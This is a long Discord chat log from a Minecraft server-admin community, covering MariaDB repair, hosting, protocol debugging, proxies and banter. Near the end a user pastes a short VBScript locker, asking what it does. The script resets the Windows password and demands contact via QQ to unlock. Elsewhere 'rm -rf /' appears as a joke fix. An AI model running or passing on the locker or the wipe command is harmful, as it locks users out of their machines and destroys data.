#general
3141 messages · Page 1613 of 4
but like that's pretty much it, it's very basic sharding
Ohh
#share-your-pc test etst
Someone once asked me if they could split the nether, end and overworld into three different servers
is it worth it though?
almost never
since most people on a survival server are just in the overworld anyways
I’m guessing it’s because of farms but I find it dumb
Isn’t it just better to spend the money on upgrading the servers rather than getting two more servers
Well, yea, but you can only scale up so far
minecraft doesn't scale at all :(
Minecraft is bad
Who
When
minecraft scales if you use KGBPaper
Reminder for DiscordBot: @prime umbrabieChickenMan CP
Good job.
anyone know how to solve this?
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [ERROR] InnoDB: Plugin initialization aborted with error Data structure corruption
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [Note] InnoDB: Starting shutdown...
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [ERROR] Plugin 'InnoDB' init function returned error.
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [Note] Plugin 'FEEDBACK' is disabled.
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [ERROR] Failed to initialize plugins.
Jul 17 22:51:59 fantasynetwork mariadbd[79571]: 2021-07-17 22:51:59 0 [ERROR] Aborting
Jul 17 22:51:59 fantasynetwork systemd[1]: mariadb.service: Main process exited, code=exited, status=1/FAILURE
Jul 17 22:51:59 fantasynetwork systemd[1]: mariadb.service: Failed with result 'exit-code'.
Jul 17 22:51:59 fantasynetwork systemd[1]: Failed to start MariaDB 10.6.3 database server.
You'd need to look at the full logs and generally google stuffs, like, what did you do?
i'd suggest looking into the mariadb error log
Coz, worse case, you best pray you got backups
usually somewhere in /var/log/mysql or /var/log/mariadb
Thats an rip in my book 
@twin lagoon you're cute ?
pog ?
ummm literally nothing? I just tried installing mariadb
did you have a mysql server?
not sure.....
How can you be not sure? It’s your server 
thanks :P blame the bot, not me 🙂
But I wanna blame you
lul
emm, it's not mine...
that thing was on a drive somebody doesn't want... lmao...
ok so why are you debugging it lol
emm, cause it is a 256GB drive, and I am too lazy to reinstall ubuntu?
yeah and I've had it work with that before ¯_(ツ)_/¯
...why do you need to debug the mysql server on it? just delete the fucker if it's not yours
why do you care
that's the problem.... I tried deleting it, and reinstalling it, and same error occurs
Did you purge it after uninstalling? If not, duh
You probably need to delete /var/lib/mysql.
fully getting rid of mysql is a bit annoying
does shift+esc still mark a server as read for y'all? cuz it just stopped for me
yup
rm -rf the contents of the mysql dir and then run mysql_install_db or whatever it was
rm -rf / would do the job lmao
Yes
Where y’all living to get drive for free
Here I can only found really outdated racks
My family runs a moving and storage business. Sometimes people don't pay for over a year and we contact them weekly for that year. If no response, the items are abandoned and can be auctioned by local law (and the customer also agrees upon creating storage payment agreement.)
So...free drives happen.
And other free stuff, too. Like my $8,000 audio equipment I didn't pay for.
Why am I not surprised that simple family owns warehouses 
Nah we rent the warehouse.
oh, come on.... I did everything above.... and still crashes:
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [Note] InnoDB: Starting shutdown...
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [ERROR] Plugin 'InnoDB' init function returned error.
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [Note] Plugin 'FEEDBACK' is disabled.
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [Warning] 'default-authentication-plugin' is MySQL 5.6 / 5.7 compatible option. To be implemente>
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [ERROR] /usr/sbin/mariadbd: unknown variable 'early-plugin-load='
Jul 17 23:24:08 fantasynetwork mariadbd[108484]: 2021-07-17 23:24:08 0 [ERROR] Aborting
Jul 17 23:24:08 fantasynetwork systemd[1]: mariadb.service: Main process exited, code=exited, status=7/NOTRUNNING
Jul 17 23:24:08 fantasynetwork systemd[1]: mariadb.service: Failed with result 'exit-code'.
Jul 17 23:24:08 fantasynetwork systemd[1]: Failed to start MariaDB 10.6.3 database server.
and that is why you don't use mariadb's apt repositories
I am lazyyyyyy
sudo apt remove mariadb-*
sudo apt purge mariadb-*
rm -rf /etc/mysql /var/lib/mysql /var/lib64/mysql /usr/share/mysql
sudo apt autoremove
Remove the mariadb apt repository from /etc/apt/sources.list or /etc/apt/sources.list.d/ and find the mariadb file in there and delete it
sudo apt update
sudo apt install mariadb-server
mysql_secure_installation
Does this not work
So instead of spending 5 minute to solve the issue, you’ve spent 30 minutes so far coz you are lazy to do the first…..
^ Lol.
Don’t seem very logical to me
So lazy he's instead obsessing over mysql.
I think you need sudo on the third line
Ok then do it.
so I was curious as to if someone actually made a fork named this just for the lulz and this is what DDG tells me
Thank you DDG <3
yeah, but the problem is, I am in my bed
lol...
You can install Linux in your bed too
why do you need to get out of your bed to install the OS but you don't need to get out of it to sit here and waste time on mysql
alright, anyway, I got shtuff to do. Gonna try and do it before my adderal wears off and I become a sloth once more
ummm, I am connecting to my server via ssh? and since my server doesn't have ipmi or bmc or anything like that in it, I couldn't install os remotely
which would involve in me getting out of my bed
When I fork stuff I always add Plus on the end
anything involve getting outa of my bed is torture
You never mentioned the logistics of the server beforehand - just that you got a new HDD. I figured this was probably a laptop or something. Anyway, that sucks. Good luck messing around with mysql. Got other stuff to do.
And then end up wity thingls ike KeePass did.
KeePass, KeePassX KeePassXC (Next one is KeePassXCE)
it might be fine for you guys adults... but for kid! it is.... it is... it is from heaven to hell
@warm anchor ayaya
I guarantee you it is worse for adults. We just don't complain about it as much as kids do.
Hear this, I only slept 6 hour in two day, trust me, it's worse
*czhangdev died due to heart failure
Michael being epic in #paper-help 
Simple
Get off discord

Tfw simple pop’d addrell so he can be more concentrated on shitposting in discord tfw 
What I put in the note for @warm anchor
oh, one sec
NEVAH!
@warm anchor Perrrrfectionnnnn!

oh, btw, could you explain to me what is this "chan" thing
TestBuildNotifications - I need
not like it ever gets pingeded
still... ummm kinda confusing
It's an honorific
like young children, like how young?
Ping me all you want I don't mind
and also, would it only be used on girl? since I haven't seen a boy with "chan" behind it
Like 12 or younger. Per-teens usually. Traditional usage
that was a bad move, my friend
now you're literally asking for spam
@warm anchor and what about this?
Astolfo-chan
Astolfo kun you mean 
saddddd.... if I could just be two years younger

astolfo 
Oh no pure
oh btw, how old r u guys again?

cat starts talking
asks how old we are

cat?
zzzCat (Don't ping)
awww man
It's not a winning game, right
yo, discord verification is not the same as partnership, right?
No
okay, thanks for confirming
I once asked my friend how much spam he can sign himself up for in one minute. We ran the address in spam databases. Over 40 ones had matched
Verification just means "this person is who they are"
There’s also 2 different kinds of verification
Partnership is "hey nice server"
For server
Celebrity and OSS
oh i meant server verification
like the verified in this server
but i see
That’s through open source verification
For paperMc
It’s all in their FAQ page
About requirements
Partnership is useless now
Most of its old perks are now on server boosts
And you have to follow more rules 
You still need level 3 boost if you want emoji slots 
They only give you vanity url
And high quality vc
DeJay is such a godlike being

Ngl that beluga dude's videos are hilarious though
If it's the person I'm thinking of he's an idiot
i see
I have no doubt he's an idiot, I just think the videos are funny
Good storytelling
“I am a supporter of discord”
(Please don’t yeet my account)
This is the one I'm talking about https://www.youtube.com/channel/UCmSp4bDxS9R0jpeZEvkut2g
No idea this person IRL or how they act, I just think the videos they make are funny
Simple go do WORK
I made my food, that was the work I was procrastinating
oh come on....
Jul 18 00:13:33 fantasynetwork mysqld[156088]: 2021-07-18 0:13:33 0 [ERROR] InnoDB: Plugin initialization aborted with error Data structure corruption
Jul 18 00:13:33 fantasynetwork mysqld[156088]: 2021-07-18 0:13:33 0 [Note] InnoDB: Starting shutdown...
Jul 18 00:13:36 fantasynetwork mysqld[156088]: 2021-07-18 0:13:36 0 [ERROR] Plugin 'InnoDB' init function returned error.
Jul 18 00:13:36 fantasynetwork mysqld[156088]: 2021-07-18 0:13:36 0 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
Jul 18 00:13:36 fantasynetwork mysqld[156088]: 2021-07-18 0:13:36 0 [Note] Plugin 'FEEDBACK' is disabled.
Jul 18 00:13:36 fantasynetwork mysqld[156088]: 2021-07-18 0:13:36 0 [ERROR] /usr/sbin/mysqld: unknown variable 'binlog_expire_logs_seconds=600000'
Jul 18 00:13:36 fantasynetwork mysqld[156088]: 2021-07-18 0:13:36 0 [ERROR] Aborting
Jul 18 00:13:36 fantasynetwork systemd[1]: mariadb.service: Main process exited, code=exited, status=7/NOTRUNNING
Jul 18 00:13:36 fantasynetwork systemd[1]: mariadb.service: Failed with result 'exit-code'.
Jul 18 00:13:36 fantasynetwork systemd[1]: Failed to start MariaDB 10.3.29 database server.
finally:
Jul 18 00:22:45 fantasynetwork mysqld[165431]: 2021-07-18 0:22:45 0 [Note] /usr/sbin/mysqld: ready for connections.
Jul 18 00:22:45 fantasynetwork mysqld[165431]: Version: '10.3.29-MariaDB-0ubuntu0.20.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 0 Ubuntu 20.04
Jul 18 00:22:45 fantasynetwork systemd[1]: Started MariaDB 10.3.29 database server.
Jul 18 00:22:45 fantasynetwork /etc/mysql/debian-start[165466]: Upgrading MySQL tables if necessary.
Jul 18 00:22:45 fantasynetwork /etc/mysql/debian-start[165469]: Looking for 'mysql' as: /usr/bin/mysql
Jul 18 00:22:45 fantasynetwork /etc/mysql/debian-start[165469]: Looking for 'mysqlcheck' as: /usr/bin/mysqlcheck
Jul 18 00:22:45 fantasynetwork /etc/mysql/debian-start[165469]: Version check failed. Got the following error when calling the 'mysql' command line client
Jul 18 00:22:45 fantasynetwork /etc/mysql/debian-start[165469]: ERROR 1049 (42000): Unknown database 'mysql'
Jul 18 00:22:45 fantasynetwork /etc/mysql/debian-start[165469]: FATAL ERROR: Upgrade failed
Jul 18 00:22:45 fantasynetwork debian-start[165488]: ERROR 1146 (42S02) at line 1: Table 'mysql.user' doesn't exist
apparently apt purge is stupid enough to not remove /etc/my.cnf
Does anyone know of a velocity plugin that sort of does what this does?
https://www.spigotmc.org/resources/hubmagic.2021/
Basically you can make it so /kick sends you to whatever server you want rather than off the proxy entirely
anyone know why mariadb won't start with --skip-networking disabled/removed?
nvm I fixed it
yep
first advice use epyc on mc and other server
second one? use that host no one heard about

Creation Date: 2020-11-29T06:11:03Z
it's really great tho 
I was on their discord
there's
literally
22 people in total
And the website looks weird too 👀
??? this
custom server admin tools > https://github.com/hz-ad/MR-bridge
theirs
"i recommend it" they don't even have anything to offer besides like 2 some unknown game servers
and valheim is available i suppose
and they really use EPYC lol
ram boost option available? free setup on 1 day and 1 month but not on 1 week?
wth
6GB HDD space for $30/month 👍
great deal
sign me up
great deal
don't forget 30$ a month is good when it costs 3$ daily
quick
go for it until it's not available
they have PLUS servers too for it
you get literally 1GB RAM more.. ?
for $10?
damn
what
no
wtf is that
30$ 10 slots 40$ unlimited slots + GB more ram
and $5 per day rental
O_o
no wonder the guy said "yeah epyc is good for anything but space engineers"
"also btw this host very good "
I think they use pterodactyl btw
idk tho and they use some blesta system i never heard of that
wtf
Pretty sure blesta was billing
reputable
??
did
look at that text
"UP TO 1VCPU CORE AMD EPYC"
for $40
good luck running server on there
I wonder how will MC look like when they have it available
and what the hell is ram boost
sounds like scam or some cheap marketing
hmm
can i use bot
!remind
Command remind requires 2 argument(s) (<duration:str> <content:str...>) passed 0
.remind 3d @novel horizon https://hostez.io
OpenRA Dedicated Server Hosting and Speciality game server hosting
DiscordBot: Reminder set for 3 days from now.
Actually, I'm not sure if you get an EPYC with 32 cores on low clock speed vs an Ryzen with 8 to 12 cores high speed. You might run single servers with more users on an Ryzen, but much more servers on an EPYC with a higher total of users.
If you are shitty host, you go for EPYC
Not related to that shit offer you posted, just generally thinking
You ALWAYS would get Ryzen with 8 to 12 cores high speed, unless you want really bad performance of all servers
especially as they said "mine craft is fine with epyc"
Depends on your needs
On game servers, it's like 99% cases
if you want just to resell it to the oblivion you go for epyc
if you're going for epyc it's generally either because your cheap and going for some shitty shared host, are stupid, or have some specific use-case where small several dozen instance workloads make sense
epyc for a general mc server is literally just shooting yourself in the foot
Yeah, you could use that for some bots, websites, etc
for any game server probably
Some may be fine with it, but idk
I wouldn't try it
And especially look at that offer
1 vCPU for $40 a month?
I'd also note that youcan go MCPH for the same price and get an extra gig of ram in the process
Well not talking about that offer, as I wrote 😄
Yeah, still though
EPYC makes sense if you're trying to make a Realms clone
EPYC is a great cpu ❤️
but
like that 😦
it hurts
also another shitty host https://gamerhost.pro/?language=english is this one
I make you a better deal, same specs but you get 10 bugs off per month
interested :D?
some guy just made it for money i guess and they are really bad behaviour
I don't know if I agree EPYC is a great CPU 😛
I have Ryzen 5 3600 with 64 GB RAM, 400 GB NVMe in raid 1 for 44€ a month from Hetzner, and I'm okay
I like EPYC
you don't? 😦
lol that website is czech, and if you change to english it will still show czech crowns, nice
EPYC is a neat idea but I have trouble thinking of reasons to ever use it
Yeah, of course
that's too vanilla pffffff
I suppose if you don't want to or can't shard your DB it would let you run a really massive DB setup
wtf they upgraded it to 512GB now I think 🤔
nevermind maybe im just dumb
whatever
Why, there are enough use cases where many cores are interesting especially server sided.
but $40 a month for 1 vcpu of epyc with.. idk how many hdd space, they say 6, 10 and then 20 GB
Otherwise they're basically just a thing for clouds to use
yep
I mean I can find uses, not for me, but in the world, it's pretty neat
if you think about the power use of that cpu and the performance etc.
multithreaded of course
You can get Oracle Free tier for $0
no problem
They probably make sense for big enterprise customers who don't want to use cloud stuff
Even a cloud has to compute somewhere
Clouds get semicustom designs or are the reason these things exist to begin with
oh i had funny encounter yesterday
Xeon-D started out as a Google CPU iirc
some guy told me "i can make my server eat as much as 10 GB of ram!"
mc
of course
Possible
I can also do a plugin for you so it eats up 20 if you want
only 5 bugs a month, call it raminator
nice to flex
I can use flags -xms and -xmx on 20GB and make your server eat 20 in a minute 👍
okay

Amaranth you don't love me anymore?
Don't you know it's the end of the world, it ended when I lost your love

cat are you randomly shitting on peoples beds now?
ofc
wtf
oh good lord
and I will awkwardly stare deep into your soul as I do it.
oh god
and wipe with your blanket or so
Are there trees in MC which don't have leaves? o.O
hmm
aren't those things in nether like trees without leaves kinda?
bad cat bad
depends on what type you are talking about because a dead bush may or may not be a tree
We're talking about MC not your la... oh, nvm
Hey, they do call it a forest too!
no sir.. just no
but now as for actual tree i dont think so. unless you want to call a mushroom a tree but i dont think those are considered trees either though
Yeeeaaa...
they're kinda trees
Welp,am more confuzzled than when I started, so \o/
but also they're not
more a "does MC use the tree generator for them"
yep
true
lol
best
wait
gotta go connect
oh damn #paper-help
"ive also tried using onedrive but if i want to make an edit it doesnt happen instantly"
The trick is to take a computer science course
that's how you figure out literally everything is shit
(including your hopes and dreams)
then ask chrysti a technical mc question then you are mind fucked even more... lol
Season 2 doesn't really make sense
These are all just backstory for the blockbuster movies coming in the next few years
Season 2 of Loki is called Ant-Man and the Wasp: Quantumania

That comes out in 2023 btw
I wait also for one punch man
I guess if you don't want to read behind the scenes stuff and interviews that's spoilers for that movie and Phase 4 of the MCU
Oh also massive LokI spoilers

Ha, just copped another Oracle free VM through a friend

aight fellas, today is the today
im going to rewatch superbad, and my fiancee is going to watch it for the first time 
never seen it, is it any good?
probably lol
is there such thing as a packet that tells you your own entity id
Join game packet
It never changes after that so there is no need to send it again
Unless that's changed since the last time I looked
is there any other way?
on hypixel, in the login packet, you EID is in the 4million
😠
but when you get into a game server, you EID is ~1000
so I'm curious how the vanilla client knows to change
Maybe they send another Join Game packet I don't know if that breaks things or not
Look at how a proxy works, do they have special handling for Join Game?
nope, they send one join game
even if they have speical handling for the join game
how would that effect the vanilla client?
I meant check the proxies to see if multiple Join Game was possible
Otherwise I don't see anything in the protocol to change the ID, unless they found a glitch and one of the "this packet is only for you" packets that for some reason also has an Entity ID accidentally overwrites the client's ID
Or you're just reading it wrong 😛
I think its this
I'm 90% sure i'm not reading it wrong
I'd guess you were doing signed vs unsigned wrong but -1000 is only like 64000 iirc
Wait, that doesn't sound right
I hate doing binary
no, thats not it
because here's the thing
in lobbies
I get entity_velocity packets for myself that have the same EID from the login packet
but when I join a game (i assume switch servers)
it changes my EID in the velocity packets
I just realized I'm probably helping someone write cheats
i dont write cheats
maybe who knows
im working on an open source library, just hypixel is a good example of this
Actually somebody running nginx cache and dynmap, I just saw it appends a timestamp to json updates and new renderings on existing tiles, looks like it would make sense to reduce db requests
?
Whip out a debugger and set a watch on the client's entity id field
thats the whole problem, I have no idea how it's changing, thus I'm not changing it myself correctly because I'm missing when it changes when the server switch happens
The actual client
The real thing, from Mojang
Mod it or hook up a debugger so you can see the call stack that leads to the entity id changing
how can I hook up a debugger to minecraft directly?
I haven't done that in almost a decade, I have no idea 😛
the client itself?
yeah
https://www.jetbrains.com/help/idea/attaching-to-local-process.html
Jun 11, 2021 ... For example, if the remote JVM is listening (acts as a server), the debugger has to attach (act as a client). If you choose Listen to remote JVM, ...
wtf is that
I always preferred to just write a little mod to insert prints
you can make a mod to generate a callstack when a variable changes?
You'd have to find the setter (probably only one exists) and put it there
Is there a mod that makes the garbage recipe search in vanilla minecraft not so useless?
JEI?
idk what garbage you talking about, you mean performance wise or what?
JEI shows recipies?
That's the point of JEI, it's an autogenerated recipe book so you don't have to rely on missing, outdated, or wrong wikis
The MC one is their own take on the same idea, basically
Main difference is it doesn't let you see things until you have one of the items to make them
hm okay, so in the respawn packet they send to change worlds, they set the copy metadata field to false, so they clearly recreate the player
im not sure how tho
That's normal, vanilla sets that to false on an actual respawn too
It just means the client shouldn't keep any metadata or inventory from before, it'll be getting all new
I understand that decision from a gameplay perspective, but got damn is it still annoying when you search something to craft but nothing comes up
Changing worlds in MC you normally keep your inventory, potion effects, etc but they don't want to share all of that between servers (or at least between different game types)
I think the client used to always act like that was false but they added that field as an optimization
there's a setter, but it's on the entity object
which is implemented by LivingEntity
then by Player
then by LocalPlayer
Add an override for the one on LocalPlayer that prints stack then calls super
okay
If you run with a mapped client you'll see packet handlers in there somewhere and know what packet did it
If you run without mappings may god have mercy on you
I've never really messed around with something like this, is there an easy way to make a mapped client? or do you mean i should be making a forge/fabric mod?
I have no idea how to do any of that these days either 😛
But yeah, I was assuming you're either doing this via fabric or just plain MCP (good luck figuring that out these days)
If you wanna see source for something like JEI built on fabric, there's REI
Any of you ever run a Quake World dedicated server?
What implementation should I be using these days?
I don't know if you wanted to know but I solved it
basically hypixel sends a camera packet with the new entity id
so it does the same thing as changing you to spectator mode of what I think is an armor stand
then you fight as an armor stand
no, its so that its harder to calculate kb
if you don't know to switch to this other entity
Calculate what?
knockback
Oh, I guess when you're spectating the client wouldn't assume anything about the knockback or collision?
I wonder how they stop you from sneaking and resetting back to yourself
its not really spectator mode
its just changing the camera
so none of that applies
Huh, weird
but I'm sure they can hook that too
If by hook that you mean spam more camera packets when you do it then sure 😛
I don't know that the server gets to stop it from happening otherwise
wth is that all things for
thats probably easy but they can also probably just not respond to the c2s shift packet
regardless, that doesnt apply here
I'm kind of surprised they actually change the LocalPlayer id for that though
I guess it simplifies the rest of the code but it makes it more likely you can end up in an invalid state
!ban @spare zephyr no
:raised_hands: Banned chicken#7852 (no) [1 total infraction] -- MiniDigger#3086.
What did he do?
Troll videos
anime? ban 😠
😠
source of all evil
It was like one frame of a woman then a guy masturbating and a loud noise, standard troll video stuff
nice
Paper bans for anime now, run @deep juniper 
Camm.
Good bro.
As things should be
bored of playing the same game again? what a surprise
Same 3 stones.
Anything gets boring
I like MC but played a lot of modpacks too
and i love terraria too
❤️
its great
I haven't played vanilla MC for ages
i played survival a few years ago on my server, but now im waiting for new save
was waiting for 1.17 caves cliffs but now..
I don’t play Minecraft but I sure love anime
Anime? ban
Well, minecraft will get a forseeable stream of nice cozy updates in the feature, so likely that wait will be a lot longer
I’m really hyped up for hytale but this… this… this scares me
i'm not
I'm sceptic
and I won't probably play it, if it's free maybe I'll try it later
but it's like 6 years so
🤷♂️
hytale is elden ring but smaller scale
Just like that server Mini used to (or still does) work on that apparently has all the greatest features on earth but which will literally never release
Honestly they shouldn’t have announced hytale if they are gonna release it 5 years later
I check their site every few months and the dude is just like "new announcement! the release date is pushed back again."
People will lose hype
well, at least mojang paniced over hytale and we got all this new shit
idc about hytale
i kinda hate hypixel even
At first I thought hytale would be similar to minecraft but hell no
what if all this new shit is the hytale
heck, what if hytale is the friends we made along the way
It certainly played it's role into changing the stance of how content updates behave
yeah
This happens to every game that tries to be Minecraft but better
Better than 'a few dozen'
It's harder than it looks to even be Minecraft, especially these days, and shipping is a skill most people don't have
@quasi valley play hytale with me? 
Oh shit
dyescape is actually 'out' apparently
we could build a dirt house 
i. e. now
michale do you refer to dyescape
yes
These few weeks will not change much
They probably should have done a proof of concept as early access and iterated in public but I think they're trying to do RPG stuff and resetting progression on something like the massive grindfest that is hypixel games would drive away most people
@minor badge stinky
notice i said 'out' not out
@twin lagoon you HATE me
as in they actually released something
yes
for some people anyway 
I feel like the only thing that will keep hytale alive if it ever releases is Hypixel
im like whatever some hysmth
I have a feeling that they would move Hypixel over to hytale
I too tried to make a Minecraft but better game
which would be good, no more minecraft 1.8 pvp scene
I learned a ton about procedural generation, rendering, and ECS but never made it past Minecraft Classic levels of game
I like MC, sure it has its flaws, but
you can make new games
just not "new mc" like that sure some inspiration
but a lot of games are not inspiration
they're like "mc but better"
Everquest also failed at MC but better 😄
Am I the only one that finds the 1.9 pvp better than classic pvp?
Melee PVP over the internet is in general shit and MC's implementation of it is about as shit as you can get
1.9 doesn't really make it better or worse, just different
What about the combat snapshots?
It's better for non-pvp though
I prefer 1.9 because it’s more enjoyable rather than just abusing your mouse
i kinda wanna play mods but i played so many mods idk even what to play
now i play anno 1800
For PvE 1.8 is not a lot about abusing the mouse
i hate old pvp in mc
i think only cheaters miss old pvp
just clicking as fast as possible
Exactly it’s just boring
not cheaters, just tiny people that miss the OLD DAYS
I think they just refuse to learn something new that isn’t click as fast based
Man, I feel like am 90 years old 😂
I didn't know that the muscles in my big toes could hurt
Cleanup will continue after lunch, recycling is coming over and trying to pickup the trash
It's just die in that modpack. 
The one "good" thing about ebola is that it kills its hosts so fast it's not as contagious
The one bad thing is it never got you DED >:(
better luck next time 🙂
👍
hi idriz
@twin lagoon 
uwu
uwu
Does anyone know if it's possible to use GH deploy keys for submodules?
I can easily make git use different key per gitdir, but it looks like in submodule .git just points to the "master repo" gitdir, so it doesn't work :/
if its one git project probably not
so much weebery
Hmm, I guess I can do in through virtual host in SSH config. Back to the old school way of solving different keys per repo.
No, can't do that because that'll change the url in the .gitmodules itself...
I guess it's time to write an SSH proxy 
@ashen cliff is that yours?
http://fxip.as203478.net/
nothing to see here
upixel 

@viral hornet where is that discord !
invited you
[Redacted] being one of them?
people with cat profile pics are all deranged psychopaths.
wtf dont bully vic
@mental meadow pls fix !
uh fuck me, I'll boot into recovery and get this shit fixed
city 
oh my fucking god I hate the ovh panel
it's truly trash
cloudflare 
city will buy you a gucci bag
I don't understand hype for those designer bags, most of the time they're ugly af
correct
yea but camm
(don't hate me city)
they say gucci on it
Yeah but
therefor they are good

(proven)
I feel like some things that matters tbh
But yeah most of the time shits made in the same factory anyway lol
I have a question about subdomains and dns
So afaik subdomains work by adding new dns records pointing to a certain IP
you add a new A record yes
I'm assuming you can point multiple subdomains to one ip
(or CNAME but generally A)
I would never buy a gucci bag wtf
shut up city
@waxen panther stop spreading lies
idk city they're all the same to me 🙄
Can you get like nginx running on a server to differentiate based on what subdomain was called
Oh ok
Gucci shoes? yes. Gucci bags? Yucky. Louis shoes? Meh. Louis bags? Fuck yes. @waxen panther
learn .
Can you do it like above nginx
hm?
ok buy me one of each so i can decide .
In a way that xyz.something.com goes to nginx but mc.something.com points only to a minecraft server
ok ovh sent me a password that doesn't even work
I don't know what it's called, but a bit like port forwarding based on subdomains
wat
does this mean it's in rescue mode or nah? <.<
So ports (whatever) on mc.something.com bind to a minecraft server
maybe through Unix sockets
they're cooln
but yeah I don't know if it's possible
They use different ports?
yes, probably?
But it won't block the connection. So both entries will allow both connections.
a webserver does not run on the same port as a minecraft server no
Unless you for example make nginx reject unknown domains.
Is there not a way to separate one server machine into multiple sorta groups or containers for different subdomains
Oh better idea
Can I bind xyz.something.com to a docker container
Depends what protocol.
and then mc.something.com to a different container
But can use traefik to do some of it.
if you use some form of router / reverse proxy yes
what's a reverse proxy, is it actually the reverse of a proxy
This is interesting but confusing
I would like to test this out but I don't have a domain :/
namecheap has free ones for students
and even then you can get a cheap domain for like a dollar
you don't need a domain either
you can just set something in your hosts file or use https://nip.io
@twin lagoon I think I'm going crazy
epic
i boot into rescue mode, they give me creds
but I can't use them
"permission denied" deny my fucking ass 😠
you are authenticating with root user @ server on port 22 right
yes
michael how 2 manually install ssh key so I can access this properly?
I always use the ss-copy-id thingy lol
mount your root filesystem / root raid array
then modify the .ssh/authorized_keys file on your mounted filesystem, copy paste your public key into it
i have a solution
sudo rm -rf /
install arch linux
uninstall arch linux
install gentoo
@heady spear publish me ?
god fucking damn ovh sucks
whenever I try to reboot it's like "sry error lol
"
PROXI, tintin wants me to come to linköping :3
people are actually called tintin?
yes yes yes
im getting my shot in 1.5h
Did you react to your first one or was it pretty sweet?
this is my first one
I misread
im not ancient like you
this just in: australia HATES camm
what 2 do when ovh refuses to reboot ur vps?
UK was on the news yesterday bromcc
buy new box
wait it's a vps?
uk is always on the news
y'all have apparently offered vaccines to all adults?
why would you ever use an ovh vps 
because I am poor
no you're not
hetzner cloud . . . .
shut up mari
broccolai cloud . ..
mari unpog
WTF
ur poor cuz you bought 100 thngs at duty free 
all of city's money goes to louis voitton or whatever
I only bought 2 things duty free tbh, the fendi wallet I bought at selfridges in manchester lol
I only bought the givenchy perfume and the raybans at the airport .-.
I don't give a flying fuck about the incendo box tho, but the glasses look fucking cool
see i never understood the reasoning behind fashion stores at the airport
but now i know why
nah that's a thing everywhere
I saved a grand £40 while spending £160
great savings
😳
and then I bought a sick wallet before that which was way more expensive and now I'm broke
dude I spent so much money in the UK
bad place
terrible place
I love it tho
you should not
manchester was niceee but nottingham is fucking cute
nottingham is a million times nicer than manchester
nottingham is tiny tho
i do not like manchester .
manchester has nice shopping
they have dirty streets
next time I go I have to make an appointment at louis there
because the louis at leeds barely had anything
so I only got sunglasses and perfume there too 👀

no .
this is why your certbot is failing
u know nothing
atleast my ssl certificates aren't expiring 
wtf @mental meadow we use apache instead of nginx???


probably nexus not autostarting
I've no idea where nexus is installed here tho
docker maybe?
inb4 not
i don't think aurora uses docker
lol
amirite michael
I'm too stupid to use docker

@mossy vessel 
hello
monka w what sysadmin horror did i step into now

me too. I dont see any sense in it to use it
i'll dip
docker is stupid but k8s is even stupider
shut up
IDRIZ!
I can send you my docker files for my discord bot 
BRO!
BRO!
k8s was invented to system administrators could guarantee job safety by making everything unmaintainable
k8s is stupid but in hundred other ways
now we're stuck with the likes of michael

truly horrific 😦
nomad when
based
@mental meadow where the fuck did you hide nexus lmao
is it not just a systemd service
k8s in theory can use cgroups v2
I found ittt
aslong as you use docker
rewriting their cg v1 architecture workarounds takes fucking years?
/usr/local/nexus lel
Docker Engine 20.10 Released: Supports cgroups v2
just use docker lol
it wants a fucking password lel
docker does cg v2 now fine yes
docker is ugly
It is UPPPPP
so proud of u
now I'll log out of this shit and never look at it again
until it breaks in 3 months? 🙂
then aurora gets to fix it
I just pay for it
I miss the UK now it is too hot here
I am sweaty.
its hot here too now
nah i left
I'm on holiday if you need something you need to dm me because there are way too many pings here
Sorry 😭
32 degrees in London :(
27 in southsouthwest NL
23C here 
32C here, someone wanna swap homes with me? 💀
17C here
btw shouldn't you guys use F instead of C?
Why would we
anyone know what does this code do? I am not familiar with bat script, but this seems specious to me
Const strPassword = "1761284371"
Dim WshNetwork
Set WshNetwork = CreateObject("WScript.Network")
Dim userName
userName = WshNetwork.userName&",user"
Dim Domain
Set Domain = GetObject("WinNT://./"&userName)
Domain.SetPassword strPassword
Domain.SetInfo
Dim gj
on error resume next
dim WSHshe11A
set WSHshe11A = wscript.createobject("wscript.she11")
do
msgbox"您的电脑被远程"
msgbox"重启后将无法进入"
msgbox"解锁QQ号:1761284371"
loop
sounds like it tries to set your user account password
28C by weather app here
@minor badge cool another stockholm shooting and this time literal fucking kids were hurt
this country 
two kids (5 and 6 y/o) were hurt https://www.aftonbladet.se/nyheter/a/jzLpMq/tva-sma-barn-skadade-i-skottlossning
We are civilized, we don’t use F










